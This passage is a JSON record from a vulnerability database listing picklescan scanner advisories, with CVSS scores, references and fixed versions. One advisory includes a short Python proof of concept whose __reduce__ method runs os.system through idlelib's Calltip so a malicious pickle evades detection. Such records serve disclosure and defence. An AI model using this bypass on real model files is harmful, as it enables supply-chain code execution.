"cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/28a7b4ef753466572bda3313737116eeb9b4e5c5" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/50", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/50" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-153.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/picklescan/PYSEC-2025-153.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10157", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10157" }, { "reference_url": "https://huggingface.co/iluem/linux_pkl/resolve/main/asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl", "reference_id": "asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-17T13:07:29Z/" } ], "url": "https://huggingface.co/iluem/linux_pkl/resolve/main/asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl" }, { "reference_url": "https://github.com/advisories/GHSA-f7qq-56ww-84cr", "reference_id": "GHSA-f7qq-56ww-84cr", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f7qq-56ww-84cr" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f7qq-56ww-84cr", "reference_id": "GHSA-f7qq-56ww-84cr", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-17T13:07:29Z/" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f7qq-56ww-84cr" }, { "reference_url": "https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L309", "reference_id": "scanner.py#L309", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-17T13:07:29Z/" } ], "url": "https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L309" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89083?format=api", "purl": "pkg:pypi/picklescan@0.0.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.31" } ], "aliases": [ "CVE-2025-10157", "GHSA-f7qq-56ww-84cr", "PYSEC-2025-153" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zh4p-1c3k-j3g8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360504?format=api", "vulnerability_id": "VCID-zhdd-ck3x-pbh7", "summary": "Duplicate Advisory: Picklescan Vulnerable to Exfiltration via DNS via linecache and ssl.get_server_certificate\n# Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-93mv-x874-956g. This link is maintained to preserve external references.\n\n# Original Description\n\nThe unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization.", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46417", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46417" }, { "reference_url": "https://github.com/advisories/GHSA-4p4h-9gvq-7xfg", "reference_id": "GHSA-4p4h-9gvq-7xfg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4p4h-9gvq-7xfg" }, { "reference_url": "https://github.com/advisories/GHSA-93mv-x874-956g", "reference_id": "GHSA-93mv-x874-956g", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-93mv-x874-956g" } ], "fixed_packages": [], "aliases": [ "GHSA-4p4h-9gvq-7xfg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zhdd-ck3x-pbh7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212450?format=api", "vulnerability_id": "VCID-zhzt-rnfn-73ab", "summary": "Picklescan vulnerable to Arbitrary File Writing", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33" }, { "reference_url": "https://github.com/advisories/GHSA-m273-6v24-x4m4", "reference_id": "GHSA-m273-6v24-x4m4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m273-6v24-x4m4" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m273-6v24-x4m4", "reference_id": "GHSA-m273-6v24-x4m4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m273-6v24-x4m4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-m273-6v24-x4m4" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zhzt-rnfn-73ab" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360645?format=api", "vulnerability_id": "VCID-zxc5-cgwk-qbcn", "summary": "Picklescan has a missing detection when calling built-in python idlelib.calltip.Calltip\n### Summary\n\nUsing idlelib.calltip.Calltip.fetch_tip, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to idlelib.calltip.Calltip.fetch_tip function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nclass EvilCalltipFetchTip:\n def __reduce__(self):\n from idlelib.calltip import Calltip\n # fetch_tip(expression) -> get_entity(expression) -> eval(expression)\n return Calltip().fetch_tip, (\"__import__('os').system('whoami')\",)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-8r4j-24qv-fmq9", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-8r4j-24qv-fmq9" }, { "reference_url": "https://github.com/advisories/GHSA-8r4j-24qv-fmq9", "reference_id": "GHSA-8r4j-24qv-fmq9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8r4j-24qv-fmq9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-8r4j-24qv-fmq9" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zxc5-cgwk-qbcn" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.5" }